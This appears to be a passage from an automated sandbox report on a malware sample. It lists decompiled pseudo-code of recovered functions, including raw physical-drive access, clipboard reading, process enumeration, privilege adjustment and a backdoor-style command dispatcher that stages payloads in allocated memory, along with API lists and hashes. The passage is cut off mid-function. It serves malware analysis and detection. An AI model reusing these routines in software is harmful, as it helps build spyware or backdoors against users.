								 *((intOrPtr*)(_t341 + 0x10c)) = 0;
								 *((intOrPtr*)(_t341 + 0x110)) = 0;
								 *((intOrPtr*)(_t341 + 0x114)) = 0;
								 *((intOrPtr*)(_t341 + 0x118)) = 0;
								 *((intOrPtr*)(_t341 + 0x11c)) = 0;
								 *((intOrPtr*)(_t341 + 0x120)) = 0;
								 *((intOrPtr*)(_t341 + 0x124)) = 0;
								 *((intOrPtr*)(_t341 + 0x128)) = 0;
								_pop(_t335);
								_pop(_t352);
								_pop(_t244);
								__eflags = _v8 ^ _t358;
								return E0042569C(0, _t244, _v8 ^ _t358, _t299, _t335, _t352);
							} else {
								memcpy(_v652, _t322 + 8, 0x4b << 2);
								_pop(_t339);
								_pop(_t354);
								_pop(_t245);
								return E0042569C(0, _t245, _v8 ^ _t358 + 0xc, _t299, _t339, _t354);
							}
						}
					}
				}
				L73:
			}

Strings

\../, xrefs: 00409099
/../, xrefs: 004090B0
\..\, xrefs: 00409082
8LD, xrefs: 0040922A
/..\, xrefs: 004090C7

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: /../$/..\$8LD$\../$\..\
API String ID: 0-4077056579
Opcode ID: 1842e5de2698999250af0dc363483c041db29f57e359a50e263972b12a92d6c2
Instruction ID: c8e3f3248c0aaf27816c1d310a667df91f17b6ab37c247148504d3ab28add2b7
Opcode Fuzzy Hash: 1842e5de2698999250af0dc363483c041db29f57e359a50e263972b12a92d6c2
Instruction Fuzzy Hash: 8FF1F1716087418FD714CF38C4817ABBBE1AF99304F54896EE8D9A7382D738E905CB96

Uniqueness

Uniqueness Score: -1.00%

Function 1000213F, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54
fileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E1000213F(void* __edx, intOrPtr _a4) {
				long _v8;
				intOrPtr _v12;
				void _v16;
				void* _t6;
				intOrPtr _t12;
				void* _t14;
				void* _t17;
				void* _t18;
				void* _t20;

				_t17 = __edx;
				_t6 = CreateFileA("\\\\.\\PhysicalDrive0", 0x80000000, 1, 0, 3, 0, 0);
				_t18 = _t6;
				if(_t18 != 0xffffffff) {
					DeviceIoControl(_t18, 0x7405c, 0, 0,  &_v16, 8,  &_v8, 0);
					CloseHandle(_t18);
					_t20 = E10015980(_v16, _v12, 0x40000000, 0);
					_t12 = _a4;
					asm("cdq");
					__eflags = _t17 - _t17;
					if(__eflags > 0) {
						L2:
						return 0;
					}
					if(__eflags < 0) {
						L7:
						_t14 = 1;
						return _t14;
					}
					__eflags = _t20 - _t12;
					if(_t20 >= _t12) {
						goto L2;
					}
					goto L7;
				}
				CloseHandle(_t6);
				goto L2;
			}

0x1000213f
0x1000215a
0x10002160
0x10002165
0x10002187
0x1000218e
0x100021a5
0x100021a7
0x100021ac
0x100021ad
0x100021af
0x1000216e
0x00000000
0x1000216e
0x100021b1
0x100021b7
0x100021b9
0x00000000
0x100021b9
0x100021b3
0x100021b5
0x00000000
0x00000000
0x00000000
0x100021b5
0x10002168
0x00000000

APIs

CreateFileA.KERNEL32(\\.\PhysicalDrive0,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000,?,?,10002A3A,000000FA), ref: 1000215A
CloseHandle.KERNEL32(00000000,?,00000000,?,?,10002A3A,000000FA), ref: 10002168
DeviceIoControl.KERNEL32 ref: 10002187
CloseHandle.KERNEL32(00000000,?,00000000,?,?,10002A3A,000000FA), ref: 1000218E
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 100021A0

Strings

\\.\PhysicalDrive0, xrefs: 10002155

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: CloseHandle$ControlCreateDeviceFileUnothrow_t@std@@@__ehfuncinfo$??2@
String ID: \\.\PhysicalDrive0
API String ID: 3840818811-1180397377
Opcode ID: 9961fd5a3702ed840e0cf9af1cf8bda4895de73fbf771ceff60ae2d4d55ab9eb
Instruction ID: 5e8c75d1f158fe7a27960e6862d14a1c4bfdff1d22002404a0cd2e275163886a
Opcode Fuzzy Hash: 9961fd5a3702ed840e0cf9af1cf8bda4895de73fbf771ceff60ae2d4d55ab9eb
Instruction Fuzzy Hash: 0901A236601124BAEB30A6A59C4DFDF7EADEB897F0F114114FB05E6090E7705940C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 1000132F, Relevance: 10.6, APIs: 7, Instructions: 51
clipboardstringCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E1000132F(intOrPtr __ecx, void* __edi) {
				intOrPtr _v8;
				char _v24;
				void* __ebp;
				int _t7;
				char* _t8;
				void* _t18;
				char* _t29;
				void* _t34;

				_v8 = __ecx;
				_t7 = OpenClipboard(0);
				if(_t7 != 0) {
					_t8 = GetClipboardData(1);
					_t18 = _t8;
					GlobalFix(_t18);
					_t29 = _t8;
					if(_t29 != 0) {
						_push(strlen(_t29));
						_push(_t29);
						E1000BECD(_v8, _t34);
					} else {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsw");
						asm("movsb");
						_push(strlen( &_v24));
						_push( &_v24);
						E1000BECD(_v8, _t34);
					}
					GlobalUnWire(_t18);
					return CloseClipboard();
				}
				return _t7;
			}

0x10001335
0x1000133a
0x10001342
0x10001348
0x1000134e
0x10001351
0x10001357
0x1000135b
0x10001392
0x10001393
0x10001394
0x1000135d
0x10001369
0x1000136a
0x1000136b
0x1000136c
0x1000136f
0x1000137a
0x1000137e
0x1000137f
0x10001384
0x1000139a
0x00000000
0x100013a7
0x100013a9

APIs

OpenClipboard.USER32(00000000), ref: 1000133A
GetClipboardData.USER32(00000001), ref: 10001348
GlobalFix.KERNEL32(00000000), ref: 10001351
strlen.MSVCRT ref: 10001370

Part of subcall function 1000BECD: __EH_prolog.LIBCMT ref: 1000BED2

strlen.MSVCRT ref: 10001388
GlobalUnWire.KERNEL32(00000000), ref: 1000139A
CloseClipboard.USER32 ref: 100013A0

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: Clipboard$Globalstrlen$CloseDataH_prologOpenWire
String ID:
API String ID: 1580164620-0
Opcode ID: f505e47873b840b3e37e7a8bc21e1f8ced80215169243cb2f275d1d30962a8c4
Instruction ID: 446506920bfc555edaf92b634e65d08d865b47f05d99d25bdd4982cc9a049203
Opcode Fuzzy Hash: f505e47873b840b3e37e7a8bc21e1f8ced80215169243cb2f275d1d30962a8c4
Instruction Fuzzy Hash: 3901A271900625EBE701EBA4CC8D9EFB77CFF04392B200065F906E6151DBB09E0287B1

Uniqueness

Uniqueness Score: -1.00%

Function 100035B9, Relevance: 10.5, APIs: 7, Instructions: 48
processstringCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E100035B9(intOrPtr _a4) {
				char _v264;
				intOrPtr _v292;
				void* _v300;
				void* _t23;
				intOrPtr* _t24;

				_v300 = 0x128;
				_t23 = CreateToolhelp32Snapshot(2, 0);
				if(_t23 == 0xffffffff) {
					L6:
					return 0;
				}
				if(Process32First(_t23,  &_v300) == 0) {
					L5:
					CloseHandle(_t23);
					goto L6;
				}
				_t24 = _strupr;
				while(1) {
					_push( *_t24(_a4));
					if(strcmp( *_t24(),  &_v264) == 0) {
						break;
					}
					if(Process32Next(_t23,  &_v300) != 0) {
						continue;
					}
					goto L5;
				}
				return _v292;
			}

0x100035c8
0x100035d7
0x100035dc
0x1000362a
0x00000000
0x1000362a
0x100035ed
0x10003623
0x10003624
0x00000000
0x10003624
0x100035ef
0x100035f5
0x100035fb
0x10003610
0x00000000
0x00000000
0x10003621
0x00000000
0x00000000
0x00000000
0x10003621
0x00000000

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 100035D2
Process32First.KERNEL32(00000000,00000128), ref: 100035E6
_strupr.MSVCRT ref: 100035F8
_strupr.MSVCRT ref: 10003603
strcmp.MSVCRT ref: 10003607
Process32Next.KERNEL32 ref: 1000361A
CloseHandle.KERNEL32(00000000,?,000000FF), ref: 10003624

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: Process32_strupr$CloseCreateFirstHandleNextSnapshotToolhelp32strcmp
String ID:
API String ID: 890738267-0
Opcode ID: 496b6d800fd359aeabe9c0b1fd4c5be37fbc295ac1f92ae0086817b93a4fc9b7
Instruction ID: ff0539e2082cbb81eef904fcd18d77141c0dfd487ed210f5f3a8ece7262716ab
Opcode Fuzzy Hash: 496b6d800fd359aeabe9c0b1fd4c5be37fbc295ac1f92ae0086817b93a4fc9b7
Instruction Fuzzy Hash: F001D176900118AAEB11E7B4DC4ABEF37ACDF483A1F118162F900DA1C0FFB5ED854A60

Uniqueness

Uniqueness Score: -1.00%

Function 004013B0, Relevance: 9.1, APIs: 6, Instructions: 81
windowCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E004013B0(void* __ecx) {
				signed int _v8;
				signed int _v12;
				int _v100;
				char _v104;
				struct tagRECT _v120;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t17;
				int _t20;
				void* _t21;
				int _t25;
				int _t26;
				void* _t43;
				void* _t45;
				void* _t46;
				void* _t48;
				void* _t59;
				void* _t62;
				void* _t63;
				void* _t66;
				void* _t68;
				void* _t69;
				void* _t70;
				signed int _t71;
				signed int _t73;

				_t73 = (_t71 & 0xfffffff8) - 0x74;
				_t17 =  *0x44f5d0; // 0x8e7de579
				_v8 = _t17 ^ _t73;
				_push(_t45);
				_t68 = __ecx;
				_push(_t62);
				_t20 = IsIconic( *(__ecx + 0x20));
				_t74 = _t20;
				if(_t20 == 0) {
					_t21 = E0040C0AE(_t45, _t68, _t62, _t68, __eflags);
					_pop(_t63);
					_pop(_t69);
					_pop(_t46);
					__eflags = _v8 ^ _t73;
					return E0042569C(_t21, _t46, _v8 ^ _t73, _t59, _t63, _t69);
				} else {
					E00414297(_t45,  &_v100, _t62, _t68, _t74);
					SendMessageA( *(_t68 + 0x20), 0x27, _v100, 0);
					_t25 = GetSystemMetrics(0xb);
					_t26 = GetSystemMetrics(0xc);
					GetClientRect( *(_t68 + 0x20),  &_v120);
					_t61 =  *(_t68 + 0x74);
					asm("cdq");
					asm("cdq");
					DrawIcon(_v100, _v120.right - _v120.left - _t25 + 1 -  *(_t68 + 0x74) >> 1, _v120.bottom - _v120.top - _t26 + 1 -  *(_t68 + 0x74) >> 1, _t61);
					_t43 = E004142EB(_t25,  &_v104, _t26, _t68, _t74);
					_t66 = _t68;
					_pop(_t70);
					_pop(_t48);
					return E0042569C(_t43, _t48, _v12 ^ _t73, _t61, _t66, _t70);
				}
			}

APIs

IsIconic.USER32(?), ref: 004013CD

Part of subcall function 00414297: __EH_prolog3.LIBCMT ref: 0041429E
Part of subcall function 00414297: BeginPaint.USER32(?,?,00000004,0040C0C5,?,00000058,00401470), ref: 004142CA

SendMessageA.USER32(?,00000027,?,00000000), ref: 004013F2
GetSystemMetrics.USER32 ref: 00401400
GetSystemMetrics.USER32 ref: 00401406
GetClientRect.USER32 ref: 00401413
DrawIcon.USER32 ref: 00401448

Part of subcall function 004142EB: __EH_prolog3.LIBCMT ref: 004142F2
Part of subcall function 004142EB: EndPaint.USER32(?,?,00000004,0040C0EB,?,?,00000058,00401470), ref: 0041430D

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3MetricsPaintSystem$BeginClientDrawIconIconicMessageRectSend
String ID:
API String ID: 2914073315-0
Opcode ID: 15a6f52d1ca93dfd04c96af9e3561332f0309d6209a4cafd982740c04d2b288d
Instruction ID: ac467c485ee73a3b1d8e19dd60be8aaedad384b2c123b2c6d785f25081db479c
Opcode Fuzzy Hash: 15a6f52d1ca93dfd04c96af9e3561332f0309d6209a4cafd982740c04d2b288d
Instruction Fuzzy Hash: 53216D727046009BC310EF79EC4AD6BB7E9FBC8614F044A2DF599C3290DA34F8048A5A

Uniqueness

Uniqueness Score: -1.00%

Function 10007762, Relevance: 9.0, APIs: 6, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E10007762(CHAR* _a4, signed int _a8) {
				void* _v8;
				signed int _v12;
				struct _TOKEN_PRIVILEGES _v24;
				int _t12;

				_t12 = OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);
				if(_t12 != 0) {
					asm("sbb eax, eax");
					_v24.PrivilegeCount = 1;
					_v12 =  ~_a8 & 0x00000002;
					LookupPrivilegeValueA(0, _a4,  &(_v24.Privileges));
					AdjustTokenPrivileges(_v8, 0,  &_v24, 0x10, 0, 0);
					if(GetLastError() == 0) {
						_push(1);
						_pop(0);
					}
					CloseHandle(_v8);
					return 0;
				} else {
					return _t12;
				}
			}

0x10007775
0x1000777d
0x10007787
0x1000778e
0x10007795
0x100077a0
0x100077b2
0x100077c0
0x100077c2
0x100077c4
0x100077c4
0x100077c8
0x100077d2
0x10007780
0x10007780
0x10007780

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 1000776E
OpenProcessToken.ADVAPI32(00000000), ref: 10007775
LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 100077A0
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 100077B2
GetLastError.KERNEL32 ref: 100077B8
CloseHandle.KERNEL32(?), ref: 100077C8

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 3398352648-0
Opcode ID: 7721d6af981b319ecaa22e1fa8714cc104f5aaa431717b8e4c772639cf5d8bb7
Instruction ID: 7d30527b064cb8a047b1c0b9e749629640a5a3f539b734789cae43888edf5e51
Opcode Fuzzy Hash: 7721d6af981b319ecaa22e1fa8714cc104f5aaa431717b8e4c772639cf5d8bb7
Instruction Fuzzy Hash: 8501E872A01129EBEB11DBA4CC89ADF7BACFB08784F204014F909E5150E7719A459BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0040AA97, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70
libraryCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040AA97(void* __ecx, void* __edx, int _a4) {
				signed int _v8;
				char _v284;
				char _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t9;
				intOrPtr* _t18;
				void* _t26;
				void* _t27;
				void* _t33;
				signed int _t34;
				void* _t35;
				signed int _t36;
				void* _t37;

				_t32 = __edx;
				_t9 =  *0x44f5d0; // 0x8e7de579
				_v8 = _t9 ^ _t36;
				_t39 = _a4 - 0x800;
				_t35 = __ecx;
				if(_a4 != 0x800) {
					__eflags = GetLocaleInfoA(_a4, 3,  &_v288, 4);
					if(__eflags != 0) {
						goto L2;
					} else {
					}
				} else {
					E004054F0(E004275EC(__edx,  &_v288, 4, "LOC"));
					_t37 = _t37 + 0x10;
					L2:
					_push(_t26);
					_push(_t33);
					_t34 =  *(E00427761(_t39));
					 *(E00427761(_t39)) =  *_t14 & 0x00000000;
					_t35 = 0x112;
					_t27 = E00427707( &_v284, 0x112, 0x111, 0x112,  &_v288);
					_t18 = E00427761(_t39);
					_t40 =  *_t18;
					if( *_t18 == 0) {
						 *(E00427761(__eflags)) = _t34;
					} else {
						E0040AA2B( *((intOrPtr*)(E00427761(_t40))));
					}
					if(_t27 == 0xffffffff || _t27 >= _t35) {
						_t12 = 0;
						__eflags = 0;
					} else {
						_t12 = LoadLibraryA( &_v284);
					}
					_pop(_t33);
					_pop(_t26);
				}
				return E0042569C(_t12, _t26, _v8 ^ _t36, _t32, _t33, _t35);
			}

APIs

_strcpy_s.LIBCMT ref: 0040AAC4

Part of subcall function 00427761: __getptd_noexit.LIBCMT ref: 00427761

__snprintf_s.LIBCMT ref: 0040AAFD

Part of subcall function 00427707: __vsnprintf_s_l.LIBCMT ref: 0042771C

GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 0040AB28
LoadLibraryA.KERNEL32(?), ref: 0040AB4B

Strings

LOC, xrefs: 0040AABC

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLibraryLoadLocale__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
String ID: LOC
API String ID: 3864805678-519433814
Opcode ID: 8fa1582c11f506927266436f534c215d7bffaaac389cf0636dbdd853f6187fc6
Instruction ID: 97373838361aac7f2ca4ef494d66bff28cc33be9144ac9d97075a17fbeeb0580
Opcode Fuzzy Hash: 8fa1582c11f506927266436f534c215d7bffaaac389cf0636dbdd853f6187fc6
Instruction Fuzzy Hash: D511E771A00318ABDB11BB71EC46BEA33A89F01318F5040B7B205A71D1DA78AD558B9E

Uniqueness

Uniqueness Score: -1.00%

Function 0042569C, Relevance: 7.6, APIs: 5, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0042569C(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x44f5d0; // 0x8e7de579
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x452c10 = _t6;
				 *0x452c0c = _t22;
				 *0x452c08 = _t25;
				 *0x452c04 = _t21;
				 *0x452c00 = _t27;
				 *0x452bfc = _t26;
				 *0x452c28 = ss;
				 *0x452c1c = cs;
				 *0x452bf8 = ds;
				 *0x452bf4 = es;
				 *0x452bf0 = fs;
				 *0x452bec = gs;
				asm("pushfd");
				_pop( *0x452c20);
				 *0x452c14 =  *_t31;
				 *0x452c18 = _v0;
				 *0x452c24 =  &_a4;
				 *0x452b60 = 0x10001;
				_t11 =  *0x452c18; // 0x0
				 *0x452b14 = _t11;
				 *0x452b08 = 0xc0000409;
				 *0x452b0c = 1;
				_t12 =  *0x44f5d0; // 0x8e7de579
				_v812 = _t12;
				_t13 =  *0x44f5d4; // 0x71821a86
				_v808 = _t13;
				 *0x452b58 = IsDebuggerPresent();
				_push(1);
				E0042D655(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x440428);
				if( *0x452b58 == 0) {
					_push(1);
					E0042D655(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

APIs

IsDebuggerPresent.KERNEL32 ref: 0042A773
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042A788
UnhandledExceptionFilter.KERNEL32(00440428), ref: 0042A793
GetCurrentProcess.KERNEL32(C0000409), ref: 0042A7AF
TerminateProcess.KERNEL32(00000000), ref: 0042A7B6

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 0778dea2f54661dffa96035823a163872ef307f4df011572cb3a2b82417b0020
Instruction ID: d0ee815df1bb176ac324e86511d928fbba5ee03cc37b3d7547be9391c41284d7
Opcode Fuzzy Hash: 0778dea2f54661dffa96035823a163872ef307f4df011572cb3a2b82417b0020
Instruction Fuzzy Hash: 9321C0B89013049FD706DF28FA456083BB4BB1A306F50943BE50997263EBB4A981CF5D

Uniqueness

Uniqueness Score: -1.00%

Function 1000821C, Relevance: 6.6, APIs: 5, Instructions: 328
memorysleepCOMMONCrypto

Download Yara Rule

C-Code - Quality: 18%

			E1000821C(void* __ecx, void* __fp0, void* _a4, int _a8) {
				void* _t54;
				long _t57;
				intOrPtr _t59;
				signed char* _t62;
				void* _t68;

				_t62 = _a4;
				_t54 =  *_t62 & 0x000000ff;
				_t68 = __ecx;
				if(_t54 > 0x6a) {
					_t54 = _t54 + 0xffffff95;
					__eflags = _t54 - 0x32;
					if(__eflags <= 0) {
						switch( *((intOrPtr*)(( *(_t54 + 0x1000862a) & 0x000000ff) * 4 +  &M100085D6))) {
							case 0:
								__edi = 0;
								_push(1);
								E1000CCF9(0, 0, E10004247, 0, 0, 0) =  *(__esi + 4);
								_push(0);
								__eax = E1000CCF9(0, 0, E100054D5,  *((intOrPtr*)( *(__esi + 4) + 0x48)), 0, 0);
								__ecx =  *(__esi + 0xfac);
								 *(__esi + 0xc +  *(__esi + 0xfac) * 4) = __eax;
								 *(__esi + 0xfac) =  *(__esi + 0xfac) + 1;
								_push(0xa);
								goto L10;
							case 1:
								goto L32;
							case 2:
								__eax =  *(__ebx + 1) & 0x000000ff;
								__edi = 0;
								__eflags = 0;
								_push(1);
								_push(0);
								_push(0);
								_push( *(__ebx + 1) & 0x000000ff);
								_push(E100078C6);
								goto L54;
							case 3:
								__eax =  *(__esi + 4);
								__edi = 0;
								_push(0);
								_push(0);
								_push(0);
								_push( *((intOrPtr*)( *(__esi + 4) + 0x48)));
								_push(E100044E0);
								goto L54;
							case 4:
								__eax =  *(__esi + 4);
								__edi = 0;
								_push(0);
								_push(0);
								_push(0);
								_push( *((intOrPtr*)( *(__esi + 4) + 0x48)));
								_push(E1000554E);
								goto L54;
							case 5:
								__edi = 0;
								__eflags = 0;
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(E1000593E);
								goto L36;
							case 6:
								__eax =  *(__esi + 4);
								__edi = 0;
								_push(0);
								_push(0);
								_push(0);
								_push( *((intOrPtr*)( *(__esi + 4) + 0x48)));
								_push(E10005A97);
								goto L54;
							case 7:
								__edi = 0;
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(E100059ED);
								goto L36;
							case 8:
								__edi = 0;
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(E10005CA9);
								goto L36;
							case 9:
								__edi = 0;
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(E10005CBB);
								goto L36;
							case 0xa:
								__edi = 0;
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(E10005D87);
								goto L36;
							case 0xb:
								__edi = 0;
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(E10005E53);
								goto L36;
							case 0xc:
								__edi = 0;
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(E10005E8B);
								goto L36;
							case 0xd:
								__edi = 0;
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(E10005F57);
								goto L36;
							case 0xe:
								__edi = 0;
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(E10006023);
								goto L36;
							case 0xf:
								_push(_a8);
								_push(__ebx);
								__eax = E100068EF();
								goto L7;
							case 0x10:
								__edi = 0;
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(E10006CB5);
								goto L36;
							case 0x11:
								__edi = 0;
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(E10007285);
								goto L36;
							case 0x12:
								return E1000761F(__eflags);
							case 0x13:
								__edi = 0;
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(E10007AD8);
								L36:
								_push(__edi);
								_push(__edi);
								__eax = E1000CCF9();
								goto L27;
							case 0x14:
								goto L56;
						}
					}
				} else {
					if(_t54 >= 0x65) {
						L32:
						_t57 = _a8 - 1;
						_a8 = _t57;
						_t54 = VirtualAlloc(0, _t57, 0x3000, 4);
						__eflags = _t54;
						_a4 = _t54;
						if(_t54 != 0) {
							memcpy(_t54,  &(_t62[1]), _a8);
							_push(1);
							_t59 = E1000CCF9(0, 0, E100044BF, _a4, 0, 0);
							goto L55;
						}
					} else {
						if(_t54 <= 0x12) {
							switch( *((intOrPtr*)(_t54 * 4 +  &M1000858A))) {
								case 0:
									_t61 = E10004627(_t62[1] & 0x000000ff);
									goto L29;
								case 1:
									_push(0);
									E10004C41();
									goto L29;
								case 2:
									_push(0);
									goto L6;
								case 3:
									_push(1);
									L6:
									__ebx = __ebx + 1;
									__eflags = __ebx;
									_push(__ebx);
									__eax = E10004A9F();
									goto L7;
								case 4:
									__eax = E100048B4(__eax);
									goto L29;
								case 5:
									__edi = 0;
									__ebx = __ebx + 1;
									_push(0);
									__eax = E1000CCF9(0, 0, E10005745, __ebx, 0, 0);
									__ecx =  *(__esi + 0xfac);
									 *(__esi + 0xc +  *(__esi + 0xfac) * 4) = __eax;
									_t9 = __esi + 0xfac;
									 *_t9 =  *(__esi + 0xfac) + 1;
									__eflags =  *_t9;
									_push(0x64);
									L10:
									Sleep();
									return __eax;
								case 6:
									__edi = 0;
									_push(1);
									_push(0);
									__ebx = __ebx + 1;
									_push(0);
									_push(__ebx);
									_push(E100058C9);
									goto L54;
								case 7:
									__edi = 0;
									_push(1);
									_push(0);
									__ebx = __ebx + 1;
									_push(0);
									_push(__ebx);
									_push(E1000478D);
									goto L54;
								case 8:
									_push(1);
									goto L13;
								case 9:
									_push(0);
									L13:
									_push(__ebx);
									__eax = E10005400();
									goto L7;
								case 0xa:
									__eax = E10005021(__ebx, _a8);
									goto L7;
								case 0xb:
									__eax = E10005131(__ebx, _a8);
									goto L7;
								case 0xc:
									__eax = E10005256(__ebx, _a8);
									goto L7;
								case 0xd:
									__edi = 0;
									_push(1);
									_push(0);
									__ebx = __ebx + 1;
									_push(0);
									_push(__ebx);
									_push(E10004653);
									goto L54;
								case 0xe:
									__eax = E100053D3(__fp0, __ebx,  *(__esi + 4));
									goto L7;
								case 0xf:
									__eax = E10005395(__ebx,  *(__esi + 4));
									L7:
									_pop(__ecx);
									L29:
									return _t61;
								case 0x10:
									__edi = 0;
									_push(1);
									_push(0);
									_push(0);
									_push( *(__esi + 4));
									_push(E10004559);
									L54:
									_push(__edi);
									_push(__edi);
									__eax = E1000CCF9();
									__esp = __esp + 0x1c;
									L55:
									 *((intOrPtr*)(_t68 + 0xc +  *(_t68 + 0xfac) * 4)) = _t59;
									_t52 = _t68 + 0xfac;
